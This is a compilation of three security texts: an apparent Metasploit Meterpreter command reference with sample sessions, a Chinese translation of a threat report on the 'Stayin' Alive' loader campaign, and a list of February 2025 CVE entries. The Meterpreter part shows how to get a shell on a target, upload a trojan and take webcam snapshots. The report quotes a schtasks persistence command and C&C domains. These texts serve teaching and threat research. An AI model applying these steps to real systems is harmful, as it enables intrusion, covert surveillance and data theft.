snmp.exe C:\WINDOWS\System32\snmp.exe ...snip... resource The ‘resource‘ command will execute meterpreter instructions located inside a text file. Containing one entry per line, “resource” will execute each line in sequence. This can help automate repetitive actions performed by a user. By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine). meterpreter > resource Usage: resource path1 path2Run the commands stored in the supplied files. meterpreter > ARGUMENTS: path1: The location of the file containing the commands to run. Path2Run: The location where to run the commands found inside the file Example usage Our file used by resource: root@kali:~# cat resource.txt ls background root@kali:~# Running resource command: meterpreter> > resource resource.txt [*] Reading /root/resource.txt [*] Running ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2012-02-29 16:41:29 -0500 . 40777/rwxrwxrwx 0 dir 2012-02-02 12:24:40 -0500 .. 100666/rw-rw-rw- 606 fil 2012-02-15 17:37:48 -0500 IDA Pro Free.lnk 100777/rwxrwxrwx 681984 fil 2012-02-02 15:09:18 -0500 Sc303.exe 100666/rw-rw-rw- 608 fil 2012-02-28 19:18:34 -0500 Shortcut to Ability Server.lnk 100666/rw-rw-rw- 522 fil 2012-02-02 12:33:38 -0500 XAMPP Control Panel.lnk [*] Running background [*] Backgrounding session 1... msf exploit(handler) > search The ‘search‘ commands provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders. Wildcards can also be used when creating the file pattern to search for. meterpreter > search [-] You must specify a valid file glob to search for, e.g. >search -f *.doc ARGUMENTS: File pattern: May contain wildcards Search location: Optional, if none is given the whole system will be searched. Example usage: meterpreter > search -f autoexec.bat Found 1 result... c:\AUTOEXEC.BAT meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes) meterpreter > shell The ‘shell‘ command will present you with a standard shell on the target system. meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> upload As with the ‘download‘ command, you need to use double-slashes with the ‘upload’ command. meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe meterpreter > webcam_list The ‘webcam_list‘ command when run from the meterpreter shell, will display currently available web cams on the target host. Example usage: meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW) meterpreter > webcam_snap The ‘webcam_snap’ command grabs a picture from a connected web cam on the target system, and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename. meterpreter > webcam_snap -h Usage: webcam_snap [options] Grab a frame from the specified webcam. OPTIONS: -h Help Banner -i >opt> The index of the webcam to use (Default: 1) -p >opt> The JPEG image path (Default: 'gnFjTnzi.jpeg') -q >opt> The JPEG image quality (Default: '50') -v >opt> Automatically view the JPEG image (Default: 'true') meterpreter > OPTIONS: -h: Displays the help information for the command -i opt: If more then 1 web cam is connected, use this option to select the device to capture the image from -p opt: Change path and filename of the image to be saved -q opt: The imagine quality, 50 being the default/medium setting, 100 being best quality -v opt: By default the value is true, which opens the image after capture. Example usage: meterpreter > webcam_snap -i 1 -v false [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg meterpreter > Using webcam_snap Meterpreter plugin | Metasploit Unleashed

在过去的几个月里，Check Point Research一直在追踪分析“STAYIN’ ALIVE ”，这是一项至少从2021年就开始活跃的持续活动。该活动在亚洲开展，主要针对电信行业和政府机构。 “Stayin’Alive”活动主要由下载和加载程序组成，其中一些被用作针对知名亚洲组织的初始攻击载体。发现的第一个下载程序名为CurKeep，目标是越南、乌兹别克斯坦和哈萨克斯坦。 观察到的工具的简单化性质以及它们的流行表明它们是一次性的，主要用于下载和运行额外的有效负载，这些工具与任何已知攻击者创建的产品没有明显的代码重叠，并且彼此之间没有太多共同之处。然而，它们都与ToddyCat基础设施有关。 该活动利用鱼叉式网络钓鱼邮件利用DLL侧加载方案来传播压缩文件，最明显的是劫持Audinate的Dante Discovery软件(CVE-2022-23748)中的dal_keepalives.dll。 “STAYIN’ ALIVE ”活动背后的攻击者利用多个独特的加载程序和下载器，所有这些加载程序和下载器都连接到同一套基础设施，与一个通常被称为“ToddyCat”的攻击相关联。 后门和加载程序的功能是非常基本和高度可变的。这表明攻击者将它们视为一次性的，并且可能主要使用它们来获得初始访问权限。 CurKeep后门 调查是从2022年9月发送给越南电信公司的一封电子邮件开始的，该电子邮件被上传到VirusTotal。邮件主题CHỈ THỊ VỀ VIỆC QUY ĐỊNH QUẢN LÝ VÀ SỬ DỤNG USER，翻译为“管理和使用说明：用户规定”，这可能表明目标在IT部门工作。电子邮件包含一个ZIP附件，里面有两个文件：一个合法的签名文件mDNSResponder.exe，重命名为匹配电子邮件，以及一个名为dal_keepalives.dll的侧加载DLL。 原始CurKeep电子邮件诱饵 首先运行合法的可执行文件(由Zoom签名)，它加载dal_keepalives.dll，然后加载一个简单的后门程序，称为“CurKeep”。在初始执行期间，它将自己和合法的exe文件复制到%APPDATA%文件夹中，并设置一个名为Reserved的环境变量来指向它的路径。该变量用于名为AppleNotifyService的计划任务，该任务的目的是维护负载执行的久性。 CurKeep攻击链 根据新发现的被劫持DLL方案，我们发现了多个部署相同工具的档案： Саммит 2022 г (парол - 0809).rar，可能用于针对乌兹别克斯坦，因为它是从乌兹别克斯坦上传的，俄文文本。 QForm V8.zip ，QForm是一个仿真软件，该文件托管在一个已知的研究门户域名上。Приказ №83 от 29.05.2023г.rar，可能用于针对哈萨克斯坦，假设它再次从哈萨克斯坦上传，并带有俄语文本。 CurKeep负载 有效负载本身是一个非常小但高效的10kb文件。它包含26个函数，不使用任何库进行静态编译，在执行时，它首先从msvcrt.dll生成一个导入数组，以获得常见的C运行时函数，因为它没有。 函数导入 全局结构构造 函数 主要有效负载逻辑由三个主要函数组成：report, shell, 和 file。它们中的每一个都被分配到一个不同的消息类型，该消息类型被发送到C&C服务器。当执行时，负载一开始运行report函数，将基本侦察信息发送到C&C服务器。然后，它创建两个独立的线程来重复运行shell和file函数。 report - CurKeep收集有关受攻击计算机的信息，包括计算机名称、用户名、systeminfo的输出以及C：\Program Files (x86)和C：\Program Files下的目录列表。 shell -以JSON格式发送计算机名，使用简单的异或加密和base64编码到C&C。预期的响应包含命令字符串，命令之间以“|”分隔。它执行每个命令并将输出发送到C&C服务器。 file -发送与shell线程相同的消息，并接收如下格式的字符串" [FILE_ID]|[FULL_PATH]|[BASE64_ENCODED_FILE_DATA] "。它解析字符串并将数据写入文件。 通信 后门通信是基于HTTP的，每个函数的结果通过post请求路径/ API /report / API /shell或/ API /file发送到匹配的API。结果被加密并存储在JSON ‘msg’ 字段中。 基础设施分析 我们发现的所有CurKeep样本都与一组C&C服务器通信，这些服务器链接到同一个TLS证书：fd31ea84894d933af323fd64d36910ca0c92af99。该证书在多个IP地址之间共享，我们认为它们都与同一个攻击者有关。 在多个IP地址之间共享证书 除了证书之外，我们还观察到域的类似注册模式以及ip使用重复的asn。 相似的注册模式和重复的asn 新发现的工具 新发现的基础设施揭示了几个额外的样本，主要是加载程序，用于同一地区的针对性攻击，几乎所有加载程序都是通过类似的方法执行的，最常见的是DLL侧加载。加载程序的性质及其多样性表明，攻击者利用简单的加载程序进行攻击，仔细选择部署额外工具的目标。 CurLu加载程序 与此基础结构相关联的最常见的工具是CurLu加载程序，它通常通过滥用bdch.dll的侧加载来加载，但这不是使用的唯一方法。这个加载程序的主要功能是联系C&C服务器并接收要加载的DLL，然后调用预定义的导出。这是通过发送一个URI?cur=[RANDOM]的请求来实现的： 构建随机请求URL 来自服务器的预期响应是DLL，然后将其加载并映射到内存中。接下来，加载程序搜索两个预定义导出中的一个，并执行找到的任何导出。 在下载的DLL中搜索导出函数 CurCore 其中一个新检索的有效负载是通过名为incorrect personal information.img的IMG文件传播的。它是从巴基斯坦上传到VirusTotal的，利用mscoree.dll劫持部署了另一个名为CurCore的小后门程序。这个CurCore变种也指向一个模仿巴基斯坦电信供应商Nayatel的域名ns01.nayatel.orinafz.com。 当执行时，DLL通过比较执行路径与C：\ProgramData\OneDrive\来检查它是否持久化执行。如果没有，它将自己和合法的PE文件复制到前面提到的OneDrive.exe文件夹下，并使用命令schtasks /create /sc minute /mo 10 /tn "OneDrive" /tr "C:\ProgramData\OneDrive\OneDrive.exe创建计划任务。 如果从正确的路径执行，它将创建一个线程，该线程初始化一个大型UUID字符串数组，然后继续加载rpcrt4.dll并动态地导入UuidFromStringA函数。接下来，它使用该函数将整个UUID数组转换为字节，每次一个UUID。 用于生成shellcode的UUID数组 然后，它使用EnumSystemLocalesA函数来执行从uid创建的shellcode。然后，这个shellcode加载并执行最终的有效负载。 将UUID转换为字节并执行提取的shellcode CurCore负载 CurCore有效负载是一个小而有限的后门。执行时，它加载并解析与winhttp.dll中的HTTP请求和kernel32.dll中的CreatePipe相关的函数(从未使用过)。 接下来，它启动主循环，其中包含负责向C&C域ns01.nayatel.orinafz.com发出HTTP请求的子循环。HTTP请求由以下结构构建： DWORD custom_checksum; DWORD ukn_1; DWORD message_type; // only being used on ReadFile command WCHAR_T desktop_folder_path[]; custom_checksum是通过对桌面文件夹路径的WCHAR_T数组中的所有第一个字节求和来计算的。该结构是base64编码的，并在以下请求中传输到服务器： 接收到的响应也是用base64编码的，它的第一个DWORD是要执行的命令ID。有效负载总共支持3个功能有限的命令，这表明它只用于初始侦察： CurLog加载程序 与同一基础设施相连的一个加载程序CurLog也被用来针对哈萨克斯坦的主要目标，我们观察到几个变体，一些通过DLL执行，另一些通过EXE执行。 CurLog加载程序的一个变体是在一个名为Compatible Products - Vector ver7.1.1.zip的zip文件中提供的，该文件包含一个同名的EXE文件。来自哈萨克斯坦的提交者也上传了一个同名的DOCX文件，其中描述了一个名为VECTOR的系统及其兼容性。 VECTOR系统描述 当负载执行时，它通过比较执行路径与C：\Users\Public\Libraries或检查它是否使用参数-u运行来检查它是否会持久性运行。如果没有，它会添加一个计划任务，并将自己和合法的exe复制到前面提到的文件夹中。 接下来，它联系C&C服务器并期望接收解码的十六进制流。如果成功，它将继续验证已解码的十六进制流是否以MZ或cDM开头，并将其保存到文件中。最后，它基于生成的文件创建一个进程。 针对越南的攻击 我们发现的最古老的变种(见下文)是通过一个以越南ISP为主题的ISO映像从越南上传的。严重混淆的示例验证它是否在正确的路径上执行，就像其他加载程序一样。如果没有，它将创建目录C：\ProgramData\ApplicationData\，并将合法的EXE文件复制到该文件夹中，并将恶意的侧面加载的DLL文件mscoree.dll复制到该文件夹中。然后，它将4个硬编码字节写入一个新文件v2net.dll，该文件用作活动ID，它获取计算机名，并发送以下网络请求： 然后使用带有密钥0x44的简单异或加密对网络响应进行解密。接下来，它检查第一个字节XOR 0x09是否等于0x44，第二个字节XOR 0xD7是否等于0x8D。你可能会注意到MZ ^ 0x09D7 = 0x448d，从中我们可以推断C&C响应应该包含PE文件。然后将接收到的文件写入AppData\Roaming\ApplicationData\[HEX_STRING]\common.exe并执行。 StylerServ后门 研究中，我们注意到许多加载程序的一个共同特征：它们的编译时间戳被修改为2015，其标头值表明它们是使用Visual Studio 2017编译的。 副标题显示Visual Studio 2017(上图)和2015年的编译时间戳 绕过这个特征，我们发现了另外一个示例，该示例由某人上传，此人也上传了CurLu加载程序信标的一个变体到127.0.0.1，并在bdch.dll上使用相同的侧加载。 新确定的示例名为StylerServ，它与前面提到的加载程序非常不同，因为它被用作被动侦听器，通过特定端口为特定文件提供服务。当DLL被执行时，它会创建五个线程，每个线程监听一个不同的端口。在样本中，我们观察到以下端口：60810、60811、60812、60813、60814。 创建监听特定端口的线程 每隔60秒，每个线程都会尝试读取一个名为styles .bin的文件。如果该文件可用且文件大小为0x1014，则认为该文件有效，并在后续线程的网络请求中提供该文件。这些线程监督套接字上演变的一整套行为。其逻辑本质上是，每个线程都可以接收远程连接，并提供前面提到的stylesers .bin的加密版本。 具有相同名称的文件(stylesers .bin)也由同一提交者上传，并使用XOR加密。在StylerServ后门中不存在解密文件的密钥，但可以通过执行加密分析获得。当它被解密时，我们可以看到加密的文件看起来像一种配置文件，包含各种文件格式和一些未知的DWORDS： 加密配置 解密配置 受害者研究 在我们对这次活动的分析中，我们观察到亚洲国家的目标一致，即越南、巴基斯坦、乌兹别克斯坦，最突出的是哈萨克斯坦。目标的迹象包括鱼叉式网络钓鱼邮件、VirusTotal提交者和文件命名约定。 此外，各种各样的加载程序和下载程序所使用的域表明，至少有一些目标或最终目标是政府附属组织，主要在哈萨克斯坦，包括： pkigoscorp[.]com——很可能是为了模仿https://pki.gov.kz/，哈萨克斯坦国家证书颁发机构。 certexvpn[.]com——哈萨克斯坦政府使用的哈萨克VPN软件。 此外，有迹象表明，其中一次攻击是围绕一个名为qform3d的模拟软件进行的。这包括使用域名qform3d[.]in的使用以及在压缩文件QForm V8.zip中传播文件。恶意软件托管在一个研究门户网站上，这表明其目标可能从事研究工作。 幕后组织 该活动利用了许多目前未知的工具和技术。不同的加载程序和下载器集合可能代表了该攻击者的初始攻击媒介，该组织已在该地区活动多年。 本报告中描述的各种工具都是定制的，仅使用一次，因此，它们与任何已知的工具集没有明显的代码重叠，甚至彼此之间也没有。然而，它们都与一组基础设施有关，其中一部分与一个名为todddycat的攻击者有关。 CurLog和CurLu加载程序使用的两个域是fopingu[.]com 和rtmcsync[.]com，它们在该文章中提到过。这两个域也显示了解析到149.28.28[.]159的历史。 虽然这些重叠并不一定表明“STAYIN’ ALIVE ”活动的幕后主使与ToddyCat的幕后主使是同一组织，但很可能两者有共同的联系，共享相同的基础设施。 总结 如上所述，一次性加载程序和下载器的使用正变得越来越普遍，甚至在老练的攻击者中也是如此；一次性工具的使用使得检测和分析工作也在变得更加困难，因为它们经常被替换，并且可能从头开始编写，这在“STAYIN’ ALIVE ”活动中很明显。 本文回顾了针对亚洲电信行业的攻击活动中使用的一些工具，通过基础设施分析不同后门之间的联系时，我们还发现了与ToddyCat的潜在联系，这是一个在该地区活动的已知行动者。虽然我们不能完全肯定ToddyCat是这次活动的幕后组织，但很明显，两者都使用了相同的基础设施攻击求类似的目标。

Google Chrome Vulnerability: CVE-2025-0998 Out of bounds memory access in V8 Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0998 Out of bounds memory access in V8 Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0998 CVE - 2025-0998

Debian: CVE-2025-24531: pam-pkcs11 -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/14/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description Possible Authentication Bypass in Error Situations Solution(s) debian-upgrade-pam-pkcs11 References https://attackerkb.com/topics/cve-2025-24531 CVE - 2025-24531 DSA-5864-1

Google Chrome Vulnerability: CVE-2025-0996 Inappropriate implementation in Browser UI Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0996 Inappropriate implementation in Browser UI Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0996 CVE - 2025-0996

Google Chrome Vulnerability: CVE-2025-0995 Use after free in V8 Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0995 Use after free in V8 Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0995 CVE - 2025-0995

mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896) Disclosed 02/13/2025 Created 02/25/2025 Description Credential Harvester in MyPRO Manager <= v1.3 from mySCADA. The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity. Author(s) Michael Heinzl Platform Windows Architectures cmd Development Source Code History

PostgreSQL: CVE-2025-1094: PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation Severity 8 CVSS (AV:N/AC:H/Au:N/C:C/I:C/A:C) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/14/2025 Description Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns. Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal. Similarly, improper neutralization of quoting syntax in PostgreSQL command line utility programs allows a source of command line arguments to achieve SQL injection when client_encoding is BIG5 and server_encoding is one of EUC_TW or MULE_INTERNAL. Versions before PostgreSQL 17.3, 16.7, 15.11, 14.16, and 13.19 are affected. Solution(s) postgres-upgrade-13_19 postgres-upgrade-14_16 postgres-upgrade-15_11 postgres-upgrade-16_7 postgres-upgrade-17_3 References https://attackerkb.com/topics/cve-2025-1094 CVE - 2025-1094

Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0997 CVE - 2025-0997

Debian: CVE-2024-57951: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: hrtimers: Handle CPU state correctly on hotplug Consider a scenario where a CPU transitions from CPUHP_ONLINE to halfway through a CPU hotunplug down to CPUHP_HRTIMERS_PREPARE, and then back to CPUHP_ONLINE: Since hrtimers_prepare_cpu() does not run, cpu_base.hres_active remains set to 1 throughout. However, during a CPU unplug operation, the tick and the clockevents are shut down at CPUHP_AP_TICK_DYING. On return to the online state, for instance CFS incorrectly assumes that the hrtick is already active, and the chance of the clockevent device to transition to oneshot mode is also lost forever for the CPU, unless it goes back to a lower state than CPUHP_HRTIMERS_PREPARE once. This round-trip reveals another issue; cpu_base.online is not set to 1 after the transition, which appears as a WARN_ON_ONCE in enqueue_hrtimer(). Aside of that, the bulk of the per CPU state is not reset either, which means there are dangling pointers in the worst case. Address this by adding a corresponding startup() callback, which resets the stale per CPU state and sets the online flag. [ tglx: Make the new callback unconditionally available, remove the online modification in the prepare() callback and clear the remaining state in the starting callback instead of the prepare callback ] Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2024-57951 CVE - 2024-57951

Debian: CVE-2025-21698: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: Revert "usb: gadget: u_serial: Disable ep before setting port to null to fix the crash caused by port being null" This reverts commit 13014969cbf07f18d62ceea40bd8ca8ec9d36cec. It is reported to cause crashes on Tegra systems, so revert it for now. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2025-21698 CVE - 2025-21698

PAN-OS: Authentication Bypass in the Management Web Interface Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description An authentication bypass in the Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to bypass the authentication otherwise required by the PAN-OS management web interface and invoke certain PHP scripts. While invoking these PHP scripts does not enable remote code execution, it can negatively impact integrity and confidentiality of PAN-OS. You can greatly reduce the risk of this issue by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practices deployment guidelines (https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431). This issue does not affect Cloud NGFW or Prisma Access software. Solution(s) palo-alto-networks-pan-os-upgrade-latest References https://attackerkb.com/topics/cve-2025-0108 CVE - 2025-0108 https://security.paloaltonetworks.com/CVE-2025-0108

Ivanti Pulse Connect Secure: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs) Severity 8 CVSS (AV:N/AC:L/Au:M/C:C/I:C/A:C) Published 02/12/2025 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description External control of a file name in Ivanti Connect Secure before version 22.7R2.4 and Ivanti Policy Secure before version 22.7R1.3 allows a remote authenticated attacker with admin privileges to write arbitrary files. Solution(s) pulse-secure-pulse-connect-secure-upgrade-22_7r2_4 References https://attackerkb.com/topics/cve-2024-38657 CVE - 2024-38657 https://forums.ivanti.com/s/article/February-Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-and-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs?language=en_US

PAN-OS: Authenticated File Read Vulnerability in the Management Web Interface Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description An authenticated file read vulnerability in the Palo Alto Networks PAN-OS software enables an authenticated attacker with network access to the management web interface to read files on the PAN-OS filesystem that are readable by the “nobody” user. You can greatly reduce the risk of this issue by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practices deployment guidelines (https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431). This issue does not affect Cloud NGFW or Prisma Access software. Solution(s) palo-alto-networks-pan-os-upgrade-latest References https://attackerkb.com/topics/cve-2025-0111 CVE - 2025-0111 https://security.paloaltonetworks.com/CVE-2025-0111

Debian: CVE-2025-21697: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Ensure job pointer is set to NULL after job completion After a job completes, the corresponding pointer in the device must be set to NULL. Failing to do so triggers a warning when unloading the driver, as it appears the job is still active. To prevent this, assign the job pointer to NULL after completing the job, indicating the job has finished. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2025-21697 CVE - 2025-21697

Debian: CVE-2025-21694: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix softlockup in __read_vmcore (part 2) Since commit 5cbcb62dddf5 ("fs/proc: fix softlockup in __read_vmcore") the number of softlockups in __read_vmcore at kdump time have gone down, but they still happen sometimes. In a memory constrained environment like the kdump image, a softlockup is not just a harmless message, but it can interfere with things like RCU freeing memory, causing the crashdump to get stuck. The second loop in __read_vmcore has a lot more opportunities for natural sleep points, like scheduling out while waiting for a data write to happen, but apparently that is not always enough. Add a cond_resched() to the second loop in __read_vmcore to (hopefully) get rid of the softlockups. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2025-21694 CVE - 2025-21694

Microsoft Windows: CVE-2025-21190: Windows Telephony Service Remote Code Execution Vulnerability Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Windows: CVE-2025-21190: Windows Telephony Service Remote Code Execution Vulnerability Solution(s) microsoft-windows-windows_10-1507-kb5052040 microsoft-windows-windows_10-1607-kb5052006 microsoft-windows-windows_10-1809-kb5052000 microsoft-windows-windows_10-21h2-kb5051974 microsoft-windows-windows_10-22h2-kb5051974 microsoft-windows-windows_11-22h2-kb5051989 microsoft-windows-windows_11-23h2-kb5051989 microsoft-windows-windows_11-24h2-kb5051987 microsoft-windows-windows_server_2012-kb5052020 microsoft-windows-windows_server_2012_r2-kb5052042 microsoft-windows-windows_server_2016-1607-kb5052006 microsoft-windows-windows_server_2019-1809-kb5052000 microsoft-windows-windows_server_2022-21h2-kb5051979 microsoft-windows-windows_server_2022-22h2-kb5051979 microsoft-windows-windows_server_2022-23h2-kb5051980 microsoft-windows-windows_server_2025-24h2-kb5051987 References https://attackerkb.com/topics/cve-2025-21190 CVE - 2025-21190 https://support.microsoft.com/help/5051974 https://support.microsoft.com/help/5051979 https://support.microsoft.com/help/5051980 https://support.microsoft.com/help/5051987 https://support.microsoft.com/help/5051989 https://support.microsoft.com/help/5052000 https://support.microsoft.com/help/5052006 https://support.microsoft.com/help/5052020 https://support.microsoft.com/help/5052040 https://support.microsoft.com/help/5052042 View more

PAN-OS: Unauthenticated File Deletion Vulnerability on the Management Web Interface Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description An unauthenticated file deletion vulnerability in the Palo Alto Networks PAN-OS management web interface enables an unauthenticated attacker with network access to the management web interface to delete certain files as the “nobody” user; this includes limited logs and configuration files but does not include system files. You can greatly reduce the risk of this issue by restricting access to the management web interface to only trusted internal IP addresses according to our recommended best practices deployment guidelines (https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431). This issue does not affect Cloud NGFW or Prisma Access software. Solution(s) palo-alto-networks-pan-os-upgrade-latest References https://attackerkb.com/topics/cve-2025-0109 CVE - 2025-0109 https://security.paloaltonetworks.com/CVE-2024-0109

Debian: CVE-2025-21699: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: gfs2: Truncate address space when flipping GFS2_DIF_JDATA flag Truncate an inode's address space when flipping the GFS2_DIF_JDATA flag: depending on that flag, the pages in the address space will either use buffer heads or iomap_folio_state structs, and we cannot mix the two. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2025-21699 CVE - 2025-21699

Microsoft Windows: CVE-2025-21351: Windows Active Directory Domain Services API Denial of Service Vulnerability Severity 7 CVSS (AV:N/AC:L/Au:N/C:N/I:N/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Windows: CVE-2025-21351: Windows Active Directory Domain Services API Denial of Service Vulnerability Solution(s) microsoft-windows-windows_10-1607-kb5052006 microsoft-windows-windows_10-1809-kb5052000 microsoft-windows-windows_10-21h2-kb5051974 microsoft-windows-windows_10-22h2-kb5051974 microsoft-windows-windows_11-22h2-kb5051989 microsoft-windows-windows_11-23h2-kb5051989 microsoft-windows-windows_11-24h2-kb5051987 microsoft-windows-windows_server_2016-1607-kb5052006 microsoft-windows-windows_server_2019-1809-kb5052000 microsoft-windows-windows_server_2022-21h2-kb5051979 microsoft-windows-windows_server_2022-22h2-kb5051979 microsoft-windows-windows_server_2022-23h2-kb5051980 microsoft-windows-windows_server_2025-24h2-kb5051987 References https://attackerkb.com/topics/cve-2025-21351 CVE - 2025-21351 https://support.microsoft.com/help/5051974 https://support.microsoft.com/help/5051979 https://support.microsoft.com/help/5051980 https://support.microsoft.com/help/5051987 https://support.microsoft.com/help/5051989 https://support.microsoft.com/help/5052000 https://support.microsoft.com/help/5052006 View more

Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Severity 6 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Solution(s) office-click-to-run-upgrade-latest References https://attackerkb.com/topics/cve-2025-21397 CVE - 2025-21397